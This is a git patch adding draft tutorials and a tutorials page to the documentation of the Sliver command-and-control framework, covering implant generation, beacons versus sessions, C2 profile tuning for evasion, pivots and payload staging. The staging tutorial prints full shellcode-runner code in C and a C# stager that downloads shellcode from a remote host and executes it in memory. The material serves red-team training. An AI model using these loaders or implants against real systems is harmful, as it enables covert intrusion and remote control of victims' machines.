From 363f59d276a5b18d5cc922a3ec753d919699f916 Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Thu, 2 May 2024 09:21:29 +0200 Subject: [PATCH 1/7] Add first draft tutorial draft for 1.6 --- docs/sliver-docs/pages/tutorials/index.tsx | 149 +++- .../pages/tutorials/md/1 - Getting Started.md | 88 +++ .../tutorials/md/2 - Beacons vs Sessions.md | 97 +++ .../md/3 - C2 Profiles and configuration.md | 51 ++ .../tutorials/md/4 - HTTP Payload staging.md | 200 +++++ .../pages/tutorials/md/5 - Pivots.md | 34 + .../pages/tutorials/md/6 - Scripting.md | 0 .../tutorials/md/7 - Assemblies and Bofs.md | 0 .../prebuild/generate-tutorials.js | 25 + .../public/asciinema/beacon_generation.cast | 527 +++++++++++++ .../public/asciinema/beacon_interractive.cast | 326 ++++++++ .../public/asciinema/beacon_tasks.cast | 438 +++++++++++ .../sliver-docs/public/asciinema/execute.cast | 307 ++++++++ .../public/asciinema/filesystem.cast | 719 ++++++++++++++++++ .../public/asciinema/first-implant.cast | 549 +++++++++++++ docs/sliver-docs/public/asciinema/shell.cast | 254 +++++++ .../sliver-docs/public/asciinema/startup.cast | 79 ++ .../public/images/Architecture.png | Bin 0 -> 102743 bytes docs/sliver-docs/public/tutorials.json | 1 + docs/sliver-docs/util/tutorials.ts | 8 + 20 files changed, 3848 insertions(+), 4 deletions(-) create mode 100644 docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md create mode 100644 docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md create mode 100644 docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md create mode 100644 docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md create mode 100644 docs/sliver-docs/pages/tutorials/md/5 - Pivots.md create mode 100644 docs/sliver-docs/pages/tutorials/md/6 - Scripting.md create mode 100644 docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md create mode 100644 docs/sliver-docs/prebuild/generate-tutorials.js create mode 100644 docs/sliver-docs/public/asciinema/beacon_generation.cast create mode 100644 docs/sliver-docs/public/asciinema/beacon_interractive.cast create mode 100644 docs/sliver-docs/public/asciinema/beacon_tasks.cast create mode 100644 docs/sliver-docs/public/asciinema/execute.cast create mode 100644 docs/sliver-docs/public/asciinema/filesystem.cast create mode 100644 docs/sliver-docs/public/asciinema/first-implant.cast create mode 100644 docs/sliver-docs/public/asciinema/shell.cast create mode 100644 docs/sliver-docs/public/asciinema/startup.cast create mode 100644 docs/sliver-docs/public/images/Architecture.png create mode 100644 docs/sliver-docs/public/tutorials.json create mode 100644 docs/sliver-docs/util/tutorials.ts diff --git a/docs/sliver-docs/pages/tutorials/index.tsx b/docs/sliver-docs/pages/tutorials/index.tsx index ef67dc224a..1f92072dac 100644 --- a/docs/sliver-docs/pages/tutorials/index.tsx +++ b/docs/sliver-docs/pages/tutorials/index.tsx @@ -1,11 +1,152 @@ +import MarkdownViewer from "@/components/markdown"; +import { Tutorials } from "@/util/tutorials"; +import { Themes } from "@/util/themes"; +import { faSearch } from "@fortawesome/free-solid-svg-icons"; +import { FontAwesomeIcon } from "@fortawesome/react-fontawesome"; +import { + Card, + CardBody, + CardHeader, + Divider, + Input, + Listbox, + ListboxItem, + ScrollShadow, +} from "@nextui-org/react"; +import { useQuery } from "@tanstack/react-query"; +import Fuse from "fuse.js"; import { NextPage } from "next"; +import { useTheme } from "next-themes"; +import Head from "next/head"; +import { useSearchParams } from "next/navigation"; +import { useRouter } from "next/router"; +import React from "react"; + +const TutorialsIndexPage: NextPage = () => { + const { theme } = useTheme(); + const router = useRouter(); + + const { data: tutorials, isLoading } = useQuery({ + queryKey: ["tutorials"], + queryFn: async (): Promise => { + const res = await fetch("/tutorials.json"); + return res.json(); + }, + }); + + const params = useSearchParams(); + const [name, setName] = React.useState(""); + const [markdown, setMarkdown] = React.useState(""); + + React.useEffect(() => { + const _name = params.get("name"); + setName(_name || ""); + setMarkdown(tutorials?.tutorials.find((tutorial) => tutorial.name === _name)?.content || ""); + }, [params, tutorials]); + + const [filterValue, setFilterValue] = React.useState(""); + const fuse = React.useMemo(() => { + return new Fuse(tutorials?.tutorials || [], { + keys: ["name"], + threshold: 0.3, + }); + }, [tutorials]); + + const visibleTutorials = React.useMemo(() => { + if (filterValue) { + // Fuzzy match display names + const fuzzy = fuse.search(filterValue).map((r) => r.item); + return fuzzy; + } + return tutorials?.tutorials || []; + }, [tutorials, fuse, filterValue]); + + const listboxClasses = React.useMemo(() => { + if (theme === Themes.DARK) { + return "p-0 gap-0 divide-y divide-default-300/50 dark:divide-default-100/80 bg-content1 overflow-visible shadow-small rounded-medium"; + } else { + return "border p-0 gap-0 divide-y divide-default-300/50 dark:divide-default-100/80 bg-content1 overflow-visible shadow-small rounded-medium"; + } + }, [theme]); + + if (isLoading || !tutorials) { + return
Loading...
; + } -const IndexPage: NextPage = () => { return ( -
-

Coming soon...

+
+ + Sliver Tutorials: {name} + +
+
+ } + value={filterValue} + onChange={(e) => setFilterValue(e.target.value)} + isClearable={true} + onClear={() => setFilterValue("")} + /> +
+
+ +
+ + {visibleTutorials.map((tutorial) => ( + { + router.push({ + pathname: "/tutorials", + query: { name: tutorial.name }, + }); + }} + > + {tutorial.name} + + ))} + +
+ +
+
+
+ {name !== "" ? ( + + + {name} + + + + + + + ) : ( +
+
+
+ Welcome to the Sliver Tutorials! +
+ Please select a tutorial +
+
+
+
+ )} +
); }; -export default IndexPage; +export default TutorialsIndexPage; diff --git a/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md b/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md new file mode 100644 index 0000000000..77eeea2e2d --- /dev/null +++ b/docs/sliver-docs/pages/tutorials/md/1 - Getting Started.md @@ -0,0 +1,88 @@ +This course will use the latest Sliver build, you can download it from [insert local web server]. + +`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately. + +First time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`. + +```asciinema +{"src": "/asciinema/startup.cast", "cols": "132", "rows": "28", "idleTimeLimit": 8} +``` + +Let's take a couple minutes to discuss what Sliver actually is and how its setup. + +![Alt text](/images/Architecture.png) + +Now that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host. + +Here's what we're going to do: +* Generate your implant using the `generate` command as shown below. +* Start HTTP listener on port 80 +* Execute implant in a separate terminal + +```asciinema +{"src": "/asciinema/first-implant.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` + +Now let’s select our implant and run our first command using the `use` command. + +```bash +[server] sliver > use +? Select a session or beacon: +SESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64 +[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0) + +[server] sliver (RELATED_EARDRUM) > pwd + +[*] /Users/tester/tools +``` + +Once you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out! + +```bash +Exploring and interacting with the filesystem + +Filesystem + cat Dump file to stdout + cd Change directory + cp Copy a file + download Download a file + grep Search for strings that match a regex within a file or directory + head Grab the first number of bytes or lines from a file + ls List current directory + memfiles List current memfiles + mkdir Make a directory + mount Get information on mounted filesystems + mv Move or rename a file + pwd Print working directory + rm Remove a file or directory + tail Grab the last number of bytes or lines from a file + upload Upload a file +``` + +```asciinema +{"src": "/asciinema/filesystem.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` + +Getting some environmental information +```bash +Info + env List environment variables + getgid Get session process GID + getpid Get session pid + getuid Get session process UID + info Get session info + ping Send round trip message to implant (does not use ICMP) + screenshot Take a screenshot + whoami Get session user execution context +``` +Execute a binary + +```asciinema +{"src": "/asciinema/execute.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` + +Running an interactive shell + +```asciinema +{"src": "/asciinema/shell.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` \ No newline at end of file diff --git a/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md b/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md new file mode 100644 index 0000000000..0e1e7d330d --- /dev/null +++ b/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md @@ -0,0 +1,97 @@ +# Beacons vs Sessions + +Sliver implants support two types of connections, sessions and beacons. + +Sessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden. + +Typically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities. + +Let’s start with generating and deploying a beacon using `http`. + +```asciinema +{"src": "/asciinema/beacon_generation.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` + +You can see the beacon callback times either in the `info` command or using `beacons watch`. + +```bash +[server] sliver > beacons watch + + ID Name Transport Username Operating System Last Check-In Next Check-In +========== =============== =========== ================= ================== =============== =============== + 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s + +``` + +Beacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command. + +The example below sets the callback time to 5s with a 1s jitter. + +```bash +[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s + +[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8) + +[+] TIRED_GIRAFFE completed task b8aa6fd8 + +[*] Reconfigured beacon + +[server] sliver (TIRED_GIRAFFE) > info + + Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45 + Name: TIRED_GIRAFFE + Hostname: tester.local + UUID: c6de1a44-016a-5fbe-b76a-da56af41316d + Username: tester + UID: 501 + GID: 20 + PID: 55879 + OS: darwin + Version: + Locale: + Arch: amd64 + Active C2: https://127.0.0.1 + Remote Address: 127.0.0.1:51803 + Proxy URL: + Interval: 1m0s + Jitter: 30s + First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago) + Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago) + Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago) +``` + +Commands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`. + +```asciinema +{"src": "/asciinema/beacon_tasks.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` + +beacon_tasks.cast + +Session can be spun up using the `interractive` command. + +```asciinema +{"src": "/asciinema/beacon_interractive.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} +``` + +Because of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session. + +Let’s switch to our newly created session and spin-up a `socks5` proxy. + +```bash + +socks +[server] sliver (TIRED_GIRAFFE) > use + +? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64 +[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab) + +[server] sliver (TIRED_GIRAFFE) > socks5 start + +[*] Started SOCKS5 127.0.0.1 1081 +⚠️ In-band SOCKS proxies can be a little unstable depending on protocol +``` + +You can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network. + +Try out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command. diff --git a/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md b/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md new file mode 100644 index 0000000000..2c1be1d666 --- /dev/null +++ b/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md @@ -0,0 +1,51 @@ +# Advanced web traffic configuration + +When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective. + +C2 profile configurations can be seen using the `c2profile` command, which also allows import and export features. + +The full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration. + +Lets imagine we’re trying to breach a customer known for using ruby-on-rails. By default sliver will use: + +- `.woff` for staging +- `.js` for poll requests +- `.html` for key exchanges +- `.png` for close session +- `.php` for session messages + +Let’s go ahead and update the session messages and staging with something more realistic and remove all references to woff or php. + +```bash +"session_file_ext": ".css", +"stager_file_ext": ".ico", +``` + +TODO pull urls for ror, maybe from seclists ? + +The next step is to restart the http listener and generate our new implant. + +```bash +TODO +asciinema export c2profile, updating extensions and paths +``` + +TODO +asciinema import custom c2profile, restart job and spin new beacon + +If you now look at the debug output you’ll notice we no longer have .php urls. + +```bash +2023/04/25 15:27:41 httpclient.go:672: [http] segments = [oauth2 v1 authenticate auth], filename = index, ext = css +2023/04/25 15:27:41 httpclient.go:482: [http] POST -> http://localhost/oauth2/v1/authenticate/auth/index.css?p=711x58387 (2228 bytes) +2023/04/25 15:27:41 httpclient.go:488: [http] POST request completed +2023/04/25 15:27:42 httpclient.go:287: Cancelling poll context +2023/04/25 15:27:42 httpclient.go:672: [http] segments = [assets], filename = jquery, ext = js +2023/04/25 15:27:42 httpclient.go:406: [http] GET -> http://localhost/assets/jquery.js?r=72074674 +2023/04/25 15:27:42 sliver.go:198: [recv] sysHandler 12 +2023/04/25 15:27:42 session.go:189: [http] send envelope ... +2023/04/25 15:27:42 httpclient.go:672: [http] segments = [oauth v1 oauth2], filename = admin, ext = css +2023/04/25 15:27:42 httpclient.go:482: [http] POST -> http://localhost/oauth/v1/oauth2/admin.css?j=56685386 (93 bytes) +``` + +Ideally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \ No newline at end of file diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md new file mode 100644 index 0000000000..3cf076e7b6 --- /dev/null +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -0,0 +1,200 @@ +# Stagers + +When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command. + +For this exercise we will create a new profile: + +``` +[server] sliver > profiles new -b **%%LINUX_IPADDRESS%%** --format shellcode --skip-symbols --debug profile1 + +[*] Saved new implant profile profile1 +``` + +The profile should now be available when listing them using `profiles` command. + +``` +[server] sliver > profiles + + Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations +============== ============== =============== ======================= ======= ============ ============= ============= + profile1 session windows/amd64 [1] https://10.0.0.4 true EXECUTABLE disabled +``` + +A stage listener linked to the profile can now be created that will host your executable. + +``` +[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7200 --profile profile1 + +[*] No builds found for profile profile1, generating a new one +[*] Job 1 (http) started +``` + +Once thats done the stage listener will host the second stage payload on the URL when specifying a file with extension `.woff` . For example, by reaching out to: [http://localhost:7200/test.woff](http://localhost:7200/test.woff) you will see that it downloads the second stage payload. + +## Metasploit + +You can generate msfvenom shellcode to connect back to our stage listener and retrieve the second stage payload, however you’ll need to include the `--prepend-size` argument to the stage listener as Metasploit payloads require the length to be prepended to the stage. You can either kill the previous stage listener using the `jobs -k` command or run the stage listener on a different port: + +```html +[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7202 --profile profile1 --prepend-size + +[*] Sliver name for profile: IDEAL_THRONE +[*] Job 2 (http) started +``` + +Once you have the stage listener setup with prepend size, you can generate the stager shellcode: + +```bash +[server] sliver > generate stager --lhost **%%LINUX_IPADDRESS%%** --lport 7202 --protocol http --save /tmp --format c + +[*] Sliver implant stager saved to: /tmp/HOLLOW_CHINO +``` + +Create a new file on the Linux box with the following contents and replace the `%%STAGE_SHELLCODE%%` field with the shellcode previously created: + +```bash +#include "windows.h" + +int main() +{ + unsigned char buf[] = **%%STAGE_SHELLCODE%%** ; + void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + memcpy(exec, buf, sizeof buf); + ((void(*)())exec)(); + + return 0; +} +``` + +Finally compile the payload. + +```bash +x86_64-w64-mingw32-gcc -o stage.exe stager.c +``` + +Once the executable is copied over to a windows host and run you should see a session connect back to your host. + +## Custom stager + +You can also use a custom stager that just retrieves sliver shellcode directly and loads it in memory similarly to the previous stager. + +```bash +using System; +using System.Net.Http; +using System.Runtime.InteropServices; +using System.Threading.Tasks; + +namespace ConsoleApp1 +{ + internal class Program + { + [DllImport("kernel32.dll")] + public static extern IntPtr VirtualAlloc( + IntPtr lpAddress, + uint dwSize, + AllocationType flAllocationType, + MemoryProtection flProtect); + + [DllImport("kernel32.dll")] + public static extern IntPtr CreateThread( + IntPtr lpThreadAttributes, + uint dwStackSize, + IntPtr lpStartAddress, + IntPtr lpParameter, + uint dwCreationFlags, + out IntPtr lpThreadId); + + [DllImport("kernel32.dll")] + public static extern bool VirtualProtect( + IntPtr lpAddress, + uint dwSize, + MemoryProtection flNewProtect, + out MemoryProtection lpflOldProtect); + + [DllImport("kernel32.dll")] + public static extern uint WaitForSingleObject( + IntPtr hHandle, + uint dwMilliseconds); + + [Flags] + public enum AllocationType + { + Commit = 0x1000, + Reserve = 0x2000, + Decommit = 0x4000, + Release = 0x8000, + Reset = 0x80000, + Physical = 0x400000, + TopDown = 0x100000, + WriteWatch = 0x200000, + LargePages = 0x20000000 + } + + [Flags] + public enum MemoryProtection + { + Execute = 0x10, + ExecuteRead = 0x20, + ExecuteReadWrite = 0x40, + ExecuteWriteCopy = 0x80, + NoAccess = 0x01, + ReadOnly = 0x02, + ReadWrite = 0x04, + WriteCopy = 0x08, + GuardModifierflag = 0x100, + NoCacheModifierflag = 0x200, + WriteCombineModifierflag = 0x400 + } + + static async Task Main(string[] args) + { + + byte[] shellcode; + + using (var handler = new HttpClientHandler()) + { + // ignore ssl, because self-signed + handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true; + + using (var client = new HttpClient(handler)) + { + // Download the shellcode + shellcode = await client.GetByteArrayAsync("http://10.0.0.4:7200/whatever.woff"); + } + } + + // Allocate a region of memory in this process as RW + var baseAddress = VirtualAlloc( + IntPtr.Zero, + (uint)shellcode.Length, + AllocationType.Commit | AllocationType.Reserve, + MemoryProtection.ReadWrite); + + // Copy the shellcode into the memory region + Marshal.Copy(shellcode, 0, baseAddress, shellcode.Length); + + // Change memory region to RX + VirtualProtect( + baseAddress, + (uint)shellcode.Length, + MemoryProtection.ExecuteRead, + out _); + + // Execute shellcode + var hThread = CreateThread( + IntPtr.Zero, + 0, + baseAddress, + IntPtr.Zero, + 0, + out _); + // Wait infinitely on this thread to stop the process exiting + WaitForSingleObject(hThread, 0xFFFFFFFF); + } + } +} +``` + +## References + +- [https://github.com/BishopFox/sliver/wiki/Stagers](https://github.com/BishopFox/sliver/wiki/Stagers) diff --git a/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md b/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md new file mode 100644 index 0000000000..28f667937f --- /dev/null +++ b/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md @@ -0,0 +1,34 @@ +# Pivots + +Pivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to. + +Sliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only. + +In both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener. + +```bash +[server] sliver (INNER_GO-KART) > pivots tcp + +[*] Started tcp pivot listener :9898 with id 1 + +[server] sliver (INNER_GO-KART) > pivots + + ID Protocol Bind Address Number Of Pivots +==== ========== ============== ================== + 1 TCP :9898 0 +``` + +The listening port and interface can be configured during creation. + +The next step is to generate a payload that will connect to our listener. + +```bash +[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos + +[*] Generating new darwin/amd64 implant binary +[*] Symbol obfuscation is enabled +[*] Build completed in 12s +[*] Implant saved to /Users/tester/tools/VALUABLE_SICK +``` + +Executing this payload will cause it to connect back through our original implant and then back to our C2 server. diff --git a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md b/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md new file mode 100644 index 0000000000..e69de29bb2 diff --git a/docs/sliver-docs/prebuild/generate-tutorials.js b/docs/sliver-docs/prebuild/generate-tutorials.js new file mode 100644 index 0000000000..3d9bcaf041 --- /dev/null +++ b/docs/sliver-docs/prebuild/generate-tutorials.js @@ -0,0 +1,25 @@ +const fs = require('fs/promises'); +const path = require('path'); + +const workingDirectory = process.cwd(); +const directoryPath = `${workingDirectory}/pages/tutorials/md`; + +async function generateSiteMap() { + const ls = await fs.readdir(directoryPath); + const files = ls.filter((file) => file.endsWith('.md')); + const tutorials = []; + for (const file of files) { + const filePath = path.join(directoryPath, file); + const fileContent = await fs.readFile(filePath, 'utf8'); + const name = path.basename(file).replace('.md', ''); + tutorials.push({ + name: name, + content: fileContent, + }); + }; + return {tutorials: tutorials}; +} + +generateSiteMap().then(async (sitemap) => { + await fs.writeFile(`${workingDirectory}/public/tutorials.json`, JSON.stringify(sitemap)); +}); diff --git a/docs/sliver-docs/public/asciinema/beacon_generation.cast b/docs/sliver-docs/public/asciinema/beacon_generation.cast new file mode 100644 index 0000000000..c47495e47b --- /dev/null +++ b/docs/sliver-docs/public/asciinema/beacon_generation.cast @@ -0,0 +1,527 @@ +{"version": 2, "width": 107, "height": 52, "timestamp": 1714588161, "env": {"SHELL": "/bin/bash", "TERM": "screen"}} +[0.132264, "o", "\u001b[?2004h"] +[0.140303, "o", "root@98df0494f659:~# "] +[0.525856, "o", "."] +[0.571373, "o", "/"] +[0.677428, "o", "s"] +[0.80137, "o", "l"] +[0.900872, "o", "i"] +[1.067898, "o", "v"] +[1.193122, "o", "e"] +[1.279315, "o", "r"] +[1.36486, "o", "-"] +[1.709238, "o", "s"] +[1.754379, "o", "e"] +[1.807274, "o", "r"] +[2.019023, "o", "v"] +[2.17738, "o", "e"] +[2.269213, "o", "r"] +[2.382114, "o", "\r\n"] +[2.388885, "o", "\u001b[?2004l\r"] +[3.468332, "o", "\u001b[31m\r\r\n \t ██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███\r\r\n\t▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒\r\r\n\t░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒\r\r\n\t ▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄\r\r\n\t▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒\r\r\n\t▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░\r\r\n\t░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░\r\r\n\t░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░\r\r\n\t\t ░ ░ ░ ░ ░ ░ ░ ░\r\r\n\u001b[0m\r\nAll hackers gain dethrone\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - 0b235b4d42d4eb75684825f5d5b30da71ec57d26 - \u001b[1mDirty\u001b[0m"] +[3.469064, "o", "\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[3.47244, "o", "\r\n"] +[3.497313, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.498826, "o", "\u001b[1 q"] +[3.501024, "o", "\u001b[?25l"] +[3.501556, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[3.5023, "o", "\u001b[6n"] +[3.50417, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[3.50457, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[9D\u001b[9C"] +[3.505001, "o", "\u001b[107D\u001b[9C\u001b[?25h"] +[4.278164, "o", "\u001b[?25l\u001b[107D"] +[4.281806, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.28757, "o", "g\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[4.288095, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[10D\u001b[9C\u001b[107D\u001b[10C\u001b[?25h"] +[4.340884, "o", "\u001b[?25l\u001b[107D"] +[4.341643, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.344387, "o", "ge\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[4.345112, "o", "\u001b[107D\u001b[1A\u001b[11D\u001b[9C\u001b[107D\u001b[11C\u001b[?25h"] +[4.484076, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.4852, "o", "\u001b[6n"] +[4.493927, "o", "gen\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[12D\u001b[9C"] +[4.49515, "o", "\u001b[107D\u001b[12C\u001b[?25h"] +[4.58054, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.589765, "o", "gene\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[4.589973, "o", "\u001b[1A\u001b[13D\u001b[9C\u001b[107D\u001b[13C\u001b[?25h"] +[4.679829, "o", "\u001b[?25l"] +[4.682549, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.688126, "o", "gener\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[14D\u001b[9C\u001b[107D\u001b[14C\u001b[?25h"] +[4.781929, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.788173, "o", "genera\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[4.789433, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[15D\u001b[9C\u001b[107D\u001b[15C\u001b[?25h"] +[4.917404, "o", "\u001b[?25l\u001b[107D"] +[4.918266, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[4.925373, "o", "generat\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[4.926998, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[16D\u001b[9C\u001b[107D\u001b[16C\u001b[?25h"] +[4.955793, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[4.95674, "o", "\u001b[6n"] +[4.961588, "o", "\u001b[1m\u001b[32mgenerate\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[4.962458, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[17D\u001b[9C\u001b[107D\u001b[17C\u001b[?25h"] +[5.002059, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.00474, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.005424, "o", "\u001b[107D\u001b[1A\u001b[18D\u001b[9C\u001b[107D\u001b[18C\u001b[?25h"] +[5.302176, "o", "\u001b[?25l"] +[5.31184, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.318248, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mb\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.321166, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[19D\u001b[9C\u001b[107D\u001b[19C\u001b[?25h"] +[5.357574, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.35804, "o", "\u001b[6n"] +[5.36021, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbe\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.360917, "o", "\u001b[107D\u001b[1A\u001b[20D\u001b[9C\u001b[107D\u001b[20C\u001b[?25h"] +[5.394933, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.396164, "o", "\u001b[6n"] +[5.398201, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbea\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[5.39906, "o", "\u001b[107D\u001b[1A\u001b[21D\u001b[9C\u001b[107D\u001b[21C\u001b[?25h"] +[5.56706, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.570584, "o", "\u001b[6n"] +[5.577426, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeac\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.578044, "o", 